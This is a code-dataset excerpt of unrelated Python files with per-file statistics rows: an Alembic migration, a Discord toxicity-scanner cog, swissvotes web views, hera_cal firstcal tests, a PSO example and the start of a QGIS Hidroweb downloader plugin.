sa.Column('market_price', sa.Float(decimal_return_scale=2), nullable=False),
sa.Column('timestamp', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['stock_id'], ['stock.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('stock_data')
# ### end Alembic commands ###
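# Usage sketch (illustrative; assumes a configured alembic.ini / env.py):
#   alembic upgrade head               # apply this migration (creates stock_data)
#   alembic downgrade b2fc3cd134da     # revert to the previous revision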
| 28.054054 | 80 | 0.692678 | 130 | 1,038 | 5.415385 | 0.484615 | 0.056818 | 0.106534 | 0.119318 | 0.349432 | 0.349432 | 0.349432 | 0.258523 | 0.133523 | 0.133523 | 0 | 0.057143 | 0.157033 | 1,038 | 36 | 81 | 28.833333 | 0.747429 | 0.294798 | 0 | 0 | 0 | 0 | 0.148201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85c0b24e4a6ca5d14ce9d591566527e4acac390 | 5,044 | py | Python | cogs/scanner.py | MattBSG/Toxic-Classification-Bot | 90e1558996452ec782c8dfecd801d8ddf8d69149 | [
"MIT"
] | null | null | null | cogs/scanner.py | MattBSG/Toxic-Classification-Bot | 90e1558996452ec782c8dfecd801d8ddf8d69149 | [
"MIT"
] | null | null | null | cogs/scanner.py | MattBSG/Toxic-Classification-Bot | 90e1558996452ec782c8dfecd801d8ddf8d69149 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import asyncio
from datetime import datetime, timedelta
import discord
from discord.ext import commands
from utils.checks import in_scan_channel
class Rollback(Exception):
pass
class Scanner(commands.Cog):
def __init__(self, bot):
super().__init__()
self.bot = bot
self.messages = []
self.manual_check = False
self.message_lock = asyncio.Lock()
self.compute_lock = asyncio.Lock()
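# message_lock guards the shared message buffer below; compute_lock serializes
# model runs so only one batch is scored at a time.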
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
# Ignore command-prefixed messages and the bot's own messages
if message.content.startswith("f."): return
if (message.author.id == self.bot.user.id): return
# Ignore message not in scan channels
if not in_scan_channel(self, message.channel.id): return
async with self.message_lock:
# Add messages to processing queue
self.messages += [message]
if len(self.messages) % 100 == 0 or len(self.messages) == 1:
self.bot.logger.info(f"Added message {len(self.messages)}/{self.bot.config.get('min_scanned')}")
await self.process_messages()
@commands.is_owner()
@commands.command("extract_messages")
async def extract_messages_command(self, ctx: commands.Context, channel_id: str='', count: int=500):
channel = self.bot.get_channel(int(channel_id))
reply = await ctx.send(f'1. Fetching {count} messages...')
start = datetime.now()
messages = await channel.history(limit=count).flatten()
await reply.edit(content=f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)\n2. Waiting in model queue...")
start = datetime.now()
self.manual_check = True
async with self.message_lock:
# Add messages to processing queue
self.messages += messages
self.bot.logger.info(f"Added messages {len(self.messages)}/{self.bot.config.get('min_scanned')}")
await self.process_messages(reply, start)
async def process_messages(self, reply: discord.Message=None, start: datetime=None):
async with self.compute_lock:
# Load model cog
nlp_cog = self.bot.get_cog('NLP')
if nlp_cog is None:
self.bot.logger.info("The cog \"NLP\" is not loaded")
return
# If enough messages were collected then start processing
async with self.message_lock:
if len(self.messages) < self.bot.config.get('min_scanned') or (self.manual_check and reply is None):
if reply is not None: await reply.edit(content=f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)\n3. Not enough messages to scan {len(self.messages)}/{self.bot.config.get('min_scanned')}")
return
test_messages = self.messages.copy()
self.messages = []
if reply is not None: await reply.edit(content=f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)\n3. Running model on {len(test_messages)} messages...")
start = datetime.now()
# Run model
flags,new_reviews,logs = await asyncio.get_event_loop().run_in_executor(None, nlp_cog.compute_messages, test_messages)
if reply is not None:
content = f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)"
for l in logs:
content += f"\n\t{l}"
content += f"\n>Flagged {len(flags)} messages and selected {len(new_reviews)} messages for the review queue."
content += f"\n4. Sending flagged messages to <#{self.bot.config.get('flag_channel')}>..."
await reply.edit(content=content)
start = datetime.now()
if len(flags) > 0:
# Send flagged messages
for flag in flags:
await self.bot.get_channel(self.bot.config.get('flag_channel')).send(embed=flag)
if reply is not None: await reply.edit(content=f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)\n5. Sending review messages to <#{self.bot.config.get('review_channel')}> or review queue...")
start = datetime.now()
# Load review queue cog
review_queue_cog = self.bot.get_cog('ReviewQueue')
if review_queue_cog is None:
self.bot.logger.info("The cog \"ReviewQueue\" is not loaded")
return
# Add flagged messages to review queue
await review_queue_cog.add_reviews_to_queue(new_reviews)
if reply is not None:
await reply.edit(content=f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)")
self.manual_check = False
def setup(bot):
bot.add_cog(Scanner(bot))
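# Usage sketch (illustrative): load this cog as a discord.py extension, e.g.
#   bot.load_extension('cogs.scanner')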
| 47.140187 | 232 | 0.601705 | 622 | 5,044 | 4.762058 | 0.209003 | 0.042539 | 0.030722 | 0.037812 | 0.378123 | 0.359217 | 0.302498 | 0.302498 | 0.302498 | 0.253207 | 0 | 0.004413 | 0.281126 | 5,044 | 106 | 233 | 47.584906 | 0.812466 | 0.059278 | 0 | 0.220779 | 0 | 0.064935 | 0.242181 | 0.106086 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025974 | false | 0.012987 | 0.064935 | 0 | 0.155844 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85d442ed83636a731ffbcfcd4c75ba8be7db01f | 6,710 | py | Python | src/onegov/swissvotes/views/votes.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | src/onegov/swissvotes/views/votes.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | src/onegov/swissvotes/views/votes.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | from morepath.request import Response
from onegov.core.security import Private
from onegov.core.security import Public
from onegov.core.security import Secret
from onegov.form import Form
from onegov.swissvotes import _
from onegov.swissvotes import SwissvotesApp
from onegov.swissvotes.collections import SwissVoteCollection
from onegov.swissvotes.external_resources import MfgPosters
from onegov.swissvotes.external_resources import SaPosters
from onegov.swissvotes.forms import SearchForm
from onegov.swissvotes.forms import UpdateDatasetForm
from onegov.swissvotes.forms import UpdateExternalResourcesForm
from onegov.swissvotes.forms import UpdateMetadataForm
from onegov.swissvotes.layouts import DeleteVotesLayout
from onegov.swissvotes.layouts import UpdateExternalResourcesLayout
from onegov.swissvotes.layouts import UpdateMetadataLayout
from onegov.swissvotes.layouts import UpdateVotesLayout
from onegov.swissvotes.layouts import VotesLayout
from translationstring import TranslationString
@SwissvotesApp.form(
model=SwissVoteCollection,
permission=Public,
form=SearchForm,
template='votes.pt'
)
def view_votes(self, request, form):
if not form.errors:
form.apply_model(self)
return {
'layout': VotesLayout(self, request),
'form': form
}
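# Pattern note: each @SwissvotesApp.form view below renders 'form.pt', applies
# the change on a valid submit, flashes a message and redirects back to the
# votes collection via layout.votes_url.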
@SwissvotesApp.form(
model=SwissVoteCollection,
permission=Private,
form=UpdateDatasetForm,
template='form.pt',
name='update'
)
def update_votes(self, request, form):
self = self.default()
layout = UpdateVotesLayout(self, request)
if form.submitted(request):
added, updated = self.update(form.dataset.data)
request.message(
_(
"Dataset updated (${added} added, ${updated} updated)",
mapping={'added': added, 'updated': updated}
),
'success'
)
# Warn if descriptor labels are missing
missing = set()
for vote in self.query():
for policy_area in vote.policy_areas:
missing |= set(
path for path in policy_area.label_path
if not isinstance(path, TranslationString)
)
if missing:
request.message(
_(
"The dataset contains unknown descriptors: ${items}.",
mapping={'items': ', '.join(sorted(missing))}
),
'warning'
)
return request.redirect(layout.votes_url)
return {
'layout': layout,
'form': form,
'cancel': request.link(self),
'button_text': _("Update"),
}
@SwissvotesApp.form(
model=SwissVoteCollection,
permission=Private,
form=UpdateMetadataForm,
template='form.pt',
name='update-metadata'
)
def update_metadata(self, request, form):
self = self.default()
layout = UpdateMetadataLayout(self, request)
if form.submitted(request):
added, updated = self.update_metadata(form.metadata.data)
request.message(
_(
"Metadata updated (${added} added, ${updated} updated)",
mapping={'added': added, 'updated': updated}
),
'success'
)
return request.redirect(layout.votes_url)
return {
'layout': layout,
'form': form,
'cancel': request.link(self),
'button_text': _("Update"),
}
@SwissvotesApp.form(
model=SwissVoteCollection,
permission=Private,
form=UpdateExternalResourcesForm,
template='form.pt',
name='update-external-resources'
)
def update_external_resources(self, request, form):
self = self.default()
layout = UpdateExternalResourcesLayout(self, request)
if form.submitted(request):
added_total = 0
updated_total = 0
removed_total = 0
failed_total = set()
for resource, cls in (
('mfg', MfgPosters(request.app.mfg_api_token)),
('sa', SaPosters())
):
if resource in form.resources.data:
added, updated, removed, failed = cls.fetch(request.session)
added_total += added
updated_total += updated
removed_total += removed
failed_total |= failed
request.message(
_(
'External resources updated (${added} added, '
'${updated} updated, ${removed} removed)',
mapping={
'added': added_total,
'updated': updated_total,
'removed': removed_total
}
),
'success'
)
if failed_total:
failed_total = ', '.join((
layout.format_bfs_number(item) for item in sorted(failed_total)
))
request.message(
_(
'Some external resources could not be updated: ${failed}',
mapping={'failed': failed_total}
),
'warning'
)
return request.redirect(layout.votes_url)
return {
'layout': layout,
'form': form,
'cancel': request.link(self),
'button_text': _("Update external resources"),
}
@SwissvotesApp.view(
model=SwissVoteCollection,
permission=Public,
name='csv'
)
def export_votes_csv(self, request):
return Response(
request.app.get_cached_dataset('csv'),
content_type='text/csv',
content_disposition='inline; filename=dataset.csv'
)
@SwissvotesApp.view(
model=SwissVoteCollection,
permission=Public,
name='xlsx'
)
def export_votes_xlsx(self, request):
return Response(
request.app.get_cached_dataset('xlsx'),
content_type=(
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
),
content_disposition='inline; filename=dataset.xlsx'
)
@SwissvotesApp.form(
model=SwissVoteCollection,
permission=Secret,
form=Form,
template='form.pt',
name='delete'
)
def delete_votes(self, request, form):
self = self.default()
layout = DeleteVotesLayout(self, request)
if form.submitted(request):
for vote in self.query():
request.session.delete(vote)
request.message(_("All votes deleted"), 'success')
return request.redirect(layout.votes_url)
return {
'layout': layout,
'form': form,
'message': _("Do you really want to delete all votes?!"),
'button_text': _("Delete"),
'button_class': 'alert',
'cancel': request.link(self)
}
| 28.432203 | 79 | 0.609836 | 639 | 6,710 | 6.300469 | 0.209703 | 0.044709 | 0.069548 | 0.033532 | 0.505961 | 0.334078 | 0.304521 | 0.231495 | 0.211128 | 0.185792 | 0 | 0.000628 | 0.288376 | 6,710 | 235 | 80 | 28.553191 | 0.842513 | 0.005514 | 0 | 0.40099 | 0 | 0 | 0.130865 | 0.016639 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034653 | false | 0 | 0.09901 | 0.009901 | 0.188119 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85d4cf44430862f9bfd99764870fc365b640c93 | 13,810 | py | Python | hera_cal/tests/test_firstcal.py | keelder/hera_cal | 6f2f78ad4a5c8a3f47065c178e15f0569f80157e | [
"MIT"
] | null | null | null | hera_cal/tests/test_firstcal.py | keelder/hera_cal | 6f2f78ad4a5c8a3f47065c178e15f0569f80157e | [
"MIT"
] | null | null | null | hera_cal/tests/test_firstcal.py | keelder/hera_cal | 6f2f78ad4a5c8a3f47065c178e15f0569f80157e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018 the HERA Project
# Licensed under the MIT License
'''Tests for firstcal.py'''
import nose.tools as nt
import os
import json
import numpy as np
import aipy
import optparse
import sys
from pyuvdata import UVCal, UVData
import hera_cal.firstcal as firstcal
from hera_cal.omni import compute_reds
from hera_cal.data import DATA_PATH
from hera_cal.calibrations import CAL_PATH
class Test_FirstCal(object):
def setUp(self):
antpos = np.array([[14.60000038, -25.28794098, 1.],
[21.89999962, -12.64397049, 1.],
[14.60000038, 25.28794098, 1.],
[-21.89999962, -12.64397049, 1.],
[-14.60000038, 0., 1.],
[21.89999962, 12.64397049, 1.],
[29.20000076, 0., 1.],
[-14.60000038, -25.28794098, 1.],
[0., 25.28794098, 1.],
[0., -25.28794098, 1.],
[0., 0., 1.],
[-7.30000019, -12.64397049, 1.],
[-7.30000019, 12.64397049, 1.],
[-21.89999962, 12.64397049, 1.],
[-29.20000076, 0., 1.],
[14.60000038, 0., 1.],
[-14.60000038, 25.28794098, 1.],
[7.30000019, -12.64397049, 1.]])
reds = [[(0, 8), (9, 16)],
[(13, 15), (14, 17), (3, 0), (4, 1), (16, 5), (12, 6)],
[(3, 17), (4, 15), (7, 0), (11, 1),
(16, 2), (12, 5), (10, 6), (14, 10)],
[(3, 6), (14, 5)],
[(0, 9), (1, 17), (2, 8), (4, 14), (6, 15), (8, 16), (12, 13), (11, 3),
(10, 4), (9, 7), (15, 10), (17, 11)],
[(3, 8), (11, 2), (9, 5)],
[(3, 9), (4, 17), (12, 15), (11, 0),
(10, 1), (8, 5), (13, 10), (14, 11)],
[(0, 13), (1, 16)],
[(0, 4), (1, 12), (6, 8), (9, 14), (15, 16), (17, 13)],
[(0, 5), (3, 16), (7, 12), (17, 2), (11, 8)],
[(0, 10), (7, 14), (10, 16), (11, 13),
(6, 2), (9, 4), (15, 8), (17, 12)],
[(1, 9), (2, 12), (5, 10), (6, 17), (8, 13),
(12, 14), (10, 3), (17, 7), (15, 11)],
[(2, 3), (5, 7)],
[(16, 17), (12, 0), (8, 1), (13, 9)],
[(0, 17), (1, 15), (3, 14), (4, 13), (9, 11), (10, 12), (12, 16), (5, 2), (7, 3),
(11, 4), (6, 5), (17, 10)],
[(3, 15), (4, 5), (7, 1), (13, 2), (11, 6)],
[(5, 15), (8, 12), (10, 11), (13, 14), (15, 17), (1, 0), (6, 1), (4, 3), (12, 4),
(11, 7), (17, 9), (16, 13)],
[(0, 15), (1, 5), (3, 13), (4, 16), (9, 10),
(11, 12), (15, 2), (7, 4), (10, 8)],
[(0, 6), (3, 12), (4, 8), (7, 10),
(9, 15), (14, 16), (10, 2), (17, 5)],
[(8, 17), (2, 1), (13, 7), (12, 9), (16, 11)],
[(0, 2), (7, 16), (9, 8)], [(4, 6), (14, 15), (3, 1), (13, 5)],
[(0, 14), (1, 13), (6, 16)],
[(2, 14), (6, 7), (5, 3)],
[(2, 9), (8, 7)],
[(2, 4), (5, 11), (6, 9), (8, 14), (15, 7)], [(1, 14), (6, 13)]]
self.freqs = np.linspace(.1, .2, 64)
self.times = np.arange(1)
ants = np.arange(len(antpos))
reds = compute_reds(len(ants), 'x', antpos, tol=0.1)
self.info = firstcal.FirstCalRedundantInfo(len(antpos))
self.info.init_from_reds(reds, antpos)
# Simulate unique "true" visibilities
np.random.seed(21)
self.vis_true = {'xx': {}}
i = 0
for rg in reds:
self.vis_true['xx'][rg[0]] = np.array(1.0 * np.random.randn(len(self.times), len(
self.freqs)) + 1.0j * np.random.randn(len(self.times), len(self.freqs)), dtype=np.complex64)
# Generate and apply firstcal gains
self.fcgains = {}
self.delays = {}
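# Constrain the per-antenna delays to sum to zero: an overall delay offset is a
# degenerate mode of redundant calibration, so the last antenna absorbs the
# negative sum of the others. Delays are drawn in ns and converted to s below.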
for i in ants:
if i == len(ants) - 1:
self.delays[i] = -1 * \
np.sum([delay for delay in self.delays.values()])
else:
self.delays[i] = np.random.randn() * 30
fcspectrum = np.exp(2.0j * np.pi * self.delays[i] * self.freqs)
self.fcgains[i] = np.array(
[fcspectrum for t in self.times], dtype=np.complex64)
self.delays[i] /= 1e9
# Generate fake data
bl2ublkey = {bl: rg[0] for rg in reds for bl in rg}
self.data = {}
self.wgts = {}
for rg in reds:
for (i, j) in rg:
self.data[(i.val, j.val)] = {}
self.wgts[(i.val, j.val)] = {}
for pol in ['xx']:
self.data[(i.val, j.val)][pol] = np.array(np.conj(self.fcgains[
i.val]) * self.fcgains[j.val] * self.vis_true['xx'][rg[0]], dtype=np.complex64)
self.wgts[(i.val, j.val)][pol] = np.ones_like(
self.data[(i.val, j.val)][pol], dtype=np.bool)
def test_data_to_delays(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
w = fcal.data_to_delays()
for (i, k), (l, m) in w.keys():
nt.assert_almost_equal(w[(i, k), (l, m)][0], self.delays[
i] - self.delays[k] - self.delays[l] + self.delays[m], places=16)
def test_data_to_delays_average(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
w = fcal.data_to_delays(average=True)
for (i, k), (l, m) in w.keys():
nt.assert_almost_equal(w[(i, k), (l, m)][0], self.delays[
i] - self.delays[k] - self.delays[l] + self.delays[m], places=16)
def test_get_N(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
# the only requirement on N is its shape.
nt.assert_equal(fcal.get_N(len(fcal.info.bl_pairs)).shape,
(len(fcal.info.bl_pairs), len(fcal.info.bl_pairs)))
def test_get_M(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
nt.assert_equal(fcal.get_M().shape, (len(
self.info.bl_pairs), len(self.times)))
_M = np.array([1 * (self.delays[i] * np.ones(len(self.times)) - self.delays[k] * np.ones(len(self.times)) - self.delays[l]
* np.ones(len(self.times)) + self.delays[m] * np.ones(len(self.times))) for (i, k), (l, m) in self.info.bl_pairs])
nt.assert_equal(np.testing.assert_almost_equal(
_M, fcal.get_M(), decimal=16), None)
def test_run(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
sols = fcal.run()
solved_delays = []
for pair in fcal.info.bl_pairs:
ant_indexes = fcal.info.blpair2antind(pair)
dlys = fcal.xhat[ant_indexes]
solved_delays.append(dlys[0] - dlys[1] - dlys[2] + dlys[3])
solved_delays = np.array(solved_delays).flatten()
nt.assert_equal(np.testing.assert_almost_equal(
fcal.M.flatten(), solved_delays, decimal=16), None)
def test_run_average(self):
fcal = firstcal.FirstCal(self.data, self.wgts, self.freqs, self.info)
sols = fcal.run(average=True)
solved_delays = []
for pair in fcal.info.bl_pairs:
ant_indexes = fcal.info.blpair2antind(pair)
dlys = fcal.xhat[ant_indexes]
solved_delays.append(dlys[0] - dlys[1] - dlys[2] + dlys[3])
solved_delays = np.array(solved_delays).flatten()
nt.assert_equal(np.testing.assert_almost_equal(
fcal.M.flatten(), solved_delays, decimal=16), None)
def test_process_ubls(self):
ubls = ''
ubaselines = firstcal.process_ubls(ubls)
nt.assert_equal(ubaselines, [])
ubls = '0_1,1_2,2_3'
ubaselines = firstcal.process_ubls(ubls)
nt.assert_equal(ubaselines, [(0, 1), (1, 2), (2, 3)])
ubls = '0_1,1,2'
nt.assert_raises(AssertionError, firstcal.process_ubls, ubls)
return
class TestFCRedInfo(object):
def test_init_from_reds(self):
antpos = np.array([[0., 0, 0], [1, 0, 0], [2, 0, 0], [3, 0, 0]])
reds = compute_reds(4, 'x', antpos)
blpairs = [((0, 1), (1, 2)), ((0, 1), (2, 3)),
((1, 2), (2, 3)), ((0, 2), (1, 3))]
A = np.array([[1, -2, 1, 0], [1, -1, -1, 1],
[0, 1, -2, 1], [1, -1, -1, 1]])
i = firstcal.FirstCalRedundantInfo(4)
i.init_from_reds(reds, antpos)
nt.assert_true(np.all(i.subsetant == np.arange(4, dtype=np.int32)))
nt.assert_equal(i.reds, reds)
nt.assert_equal(i.bl_pairs, blpairs)
nt.assert_true(i.blperant[0] == 2)
nt.assert_true(i.blperant[1] == 3)
nt.assert_true(i.blperant[2] == 3)
nt.assert_true(i.blperant[3] == 2)
nt.assert_true(np.all(i.A == A))
def test_bl_index(self):
antpos = np.array([[0., 0, 0], [1, 0, 0], [2, 0, 0], [3, 0, 0]])
reds = compute_reds(4, 'x', antpos)
i = firstcal.FirstCalRedundantInfo(4)
i.init_from_reds(reds, antpos)
bls_order = [bl for ublgp in reds for bl in ublgp]
for k, b in enumerate(bls_order):
nt.assert_equal(i.bl_index(b), k)
def test_blpair_index(self):
antpos = np.array([[0., 0, 0], [1, 0, 0], [2, 0, 0], [3, 0, 0]])
reds = compute_reds(4, 'x', antpos)
blpairs = [((0, 1), (1, 2)), ((0, 1), (2, 3)),
((1, 2), (2, 3)), ((0, 2), (1, 3))]
i = firstcal.FirstCalRedundantInfo(4)
i.init_from_reds(reds, antpos)
for k, bp in enumerate(blpairs):
nt.assert_equal(i.blpair_index(bp), k)
def test_blpair2antindex(self):
antpos = np.array([[0., 0, 0], [1, 0, 0], [2, 0, 0], [3, 0, 0]])
reds = compute_reds(4, 'x', antpos)
blpairs = [((0, 1), (1, 2)), ((0, 1), (2, 3)),
((1, 2), (2, 3)), ((0, 2), (1, 3))]
i = firstcal.FirstCalRedundantInfo(4)
i.init_from_reds(reds, antpos)
for bp in blpairs:
# materialize map() so the comparison is elementwise under Python 3
nt.assert_true(np.all(i.blpair2antind(bp) == list(map(
i.ant_index, np.array(bp).flatten()))))
class Test_firstcal_run(object):
global calfile
global xx_vis
calfile = "hera_test_calfile"
xx_vis = "zen.2457698.40355.xx.HH.uvcAA"
# add directory with calfile
if CAL_PATH not in sys.path:
sys.path.append(CAL_PATH)
def test_empty_fileset(self):
o = firstcal.firstcal_option_parser()
cmd = "-C {0} -p xx".format(calfile)
opts, files = o.parse_args(cmd.split())
history = 'history'
nt.assert_raises(AssertionError, firstcal.firstcal_run,
files, opts, history)
return
def test_single_file_execution(self):
objective_file = os.path.join(
DATA_PATH, 'zen.2457698.40355.xx.HH.uvcAA.first.calfits')
xx_vis4real = os.path.join(DATA_PATH, xx_vis)
if os.path.exists(objective_file):
os.remove(objective_file)
o = firstcal.firstcal_option_parser()
cmd = "-C {0} -p xx --ex_ants=81 {1}".format(calfile, xx_vis4real)
opts, files = o.parse_args(cmd.split())
history = 'history'
firstcal.firstcal_run(files, opts, history)
nt.assert_true(os.path.exists(objective_file))
os.remove(objective_file)
return
def test_single_file_execution_nocalfile(self):
objective_file = os.path.join(
DATA_PATH, 'zen.2457999.76839.xx.HH.uvA.first.calfits')
xx_vis = os.path.join(DATA_PATH, 'zen.2457999.76839.xx.HH.uvA')
if os.path.exists(objective_file):
os.remove(objective_file)
o = firstcal.firstcal_option_parser()
cmd = "-p xx {0}".format(xx_vis)
opts, files = o.parse_args(cmd.split())
history = 'history'
firstcal.firstcal_run(files, opts, history)
nt.assert_true(os.path.exists(objective_file))
os.remove(objective_file)
return
def test_overwrite(self):
objective_file = os.path.join(
DATA_PATH, 'zen.2457698.40355.xx.HH.uvcAA.first.calfits')
xx_vis4real = os.path.join(DATA_PATH, xx_vis)
if os.path.exists(objective_file):
os.remove(objective_file)
_ = open(objective_file, 'a').close()
o = firstcal.firstcal_option_parser()
cmd = "-C {0} -p xx --overwrite {1}".format(calfile, xx_vis4real)
opts, files = o.parse_args(cmd.split())
history = 'history'
firstcal.firstcal_run(files, opts, history)
# check its a calfits file
uvc = UVCal()
uvc.read_calfits(objective_file)
# check a metadata column for accuracy
nt.assert_equal(uvc.Nants_data, 19)
# remove file
os.remove(objective_file)
return
def test_rotated_antennas(self):
objective_file = os.path.join(
DATA_PATH, 'zen.2457555.42443.xx.HH.uvcA.first.calfits')
xx_vis = os.path.join(
DATA_PATH, 'zen.2457555.42443.xx.HH.uvcA')
o = firstcal.firstcal_option_parser()
cmd = "-p xx -C {0} --ex_ants=22,81 {1}".format(calfile, xx_vis)
opts, files = o.parse_args(cmd.split())
history = 'history'
firstcal.firstcal_run(files, opts, history)
nt.assert_true(os.path.exists(objective_file))
os.remove(objective_file)
return
| 43.021807 | 142 | 0.506445 | 1,932 | 13,810 | 3.511387 | 0.127847 | 0.03066 | 0.022995 | 0.016509 | 0.652565 | 0.592718 | 0.533461 | 0.512087 | 0.489829 | 0.451356 | 0 | 0.1113 | 0.316872 | 13,810 | 320 | 143 | 43.15625 | 0.607802 | 0.024475 | 0 | 0.365942 | 0 | 0 | 0.033219 | 0.018802 | 0 | 0 | 0 | 0 | 0.094203 | 1 | 0.061594 | false | 0 | 0.043478 | 0 | 0.144928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85d6d53dc93cd8aac172a3ae52618d490931487 | 1,123 | py | Python | src/Examples/PSO2006Example.py | PatrikValkovic/MasterThesis | 6e9f3b186541db6c8395ebc96ace7289d01c805b | [
"MIT"
] | null | null | null | src/Examples/PSO2006Example.py | PatrikValkovic/MasterThesis | 6e9f3b186541db6c8395ebc96ace7289d01c805b | [
"MIT"
] | null | null | null | src/Examples/PSO2006Example.py | PatrikValkovic/MasterThesis | 6e9f3b186541db6c8395ebc96ace7289d01c805b | [
"MIT"
] | null | null | null | ###############################
#
# Created by Patrik Valkovic
# 5/7/2021
#
###############################
import numpy as np
import ffeat.pso as pso
import ffeat.measure as measure
import bbobtorch
DIM = 40
problem = bbobtorch.create_f07(DIM)
best_fitness = []
mean_fitness = []
alg = pso.PSO(
pso.initialization.Uniform(100, -5, 5, DIM), # position initialization
pso.initialization.Uniform(100, -1, 1, DIM), # velocity initialization
pso.evaluation.Evaluation(problem),
pso.neighborhood.Random(3), # use Random neighborhood
pso.update.PSO2006(), # use PSO2006 algorithm
measurements_termination=[
measure.FitnessLowest(measure.reporting.Array(best_fitness)),
measure.FitnessMean(measure.reporting.Array(mean_fitness)),
],
clip_position=pso.clip.Position(-5,5),
iterations=100,
)
alg()
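# Plot best/mean fitness relative to the problem's known optimum (f_opt)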
import matplotlib.pyplot as plt
plt.figure()
plt.plot(range(len(best_fitness)), np.array(best_fitness) - float(problem.f_opt), label='Best fitness')
plt.plot(range(len(mean_fitness)), np.array(mean_fitness) - float(problem.f_opt), label='Mean fitness')
plt.legend()
plt.show()
| 28.075 | 103 | 0.687444 | 143 | 1,123 | 5.307692 | 0.412587 | 0.072464 | 0.063241 | 0.071146 | 0.073781 | 0.073781 | 0 | 0 | 0 | 0 | 0 | 0.034908 | 0.13268 | 1,123 | 39 | 104 | 28.794872 | 0.744353 | 0.114871 | 0 | 0 | 0 | 0 | 0.026002 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.178571 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85efd598232cd71c89a7195d242dd7d67cb6a3c | 20,343 | py | Python | hidroweb_downloader.py | alexnaoki/hidroweb-downloader-plugin | 6609ba025bef6c088a072c20f026d0610769c677 | [
"MIT"
] | 1 | 2021-03-28T01:55:06.000Z | 2021-03-28T01:55:06.000Z | hidroweb_downloader.py | alexnaoki/hidroweb-downloader-plugin | 6609ba025bef6c088a072c20f026d0610769c677 | [
"MIT"
] | null | null | null | hidroweb_downloader.py | alexnaoki/hidroweb-downloader-plugin | 6609ba025bef6c088a072c20f026d0610769c677 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
/***************************************************************************
HidrowebDownloader
A QGIS plugin
Download hydrological data from ANA's API (Hidroweb)
Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/
-------------------
begin : 2021-03-27
git sha : $Format:%H$
copyright : (C) 2021 by Alex Naoki Asato Kobayashi
email : alexkobayashi10@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication, QVariant
from qgis.PyQt.QtGui import QIcon
from qgis.PyQt.QtWidgets import QAction
from qgis.core import *
# Initialize Qt resources from file resources.py
from .resources import *
# Import the code for the dialog
from .hidroweb_downloader_dialog import HidrowebDownloaderDialog
import os.path
from shapely.geometry import Point, Polygon, MultiPolygon
import requests, csv, os, datetime, calendar
import xml.etree.ElementTree as ET
class HidrowebDownloader:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgsInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# initialize locale
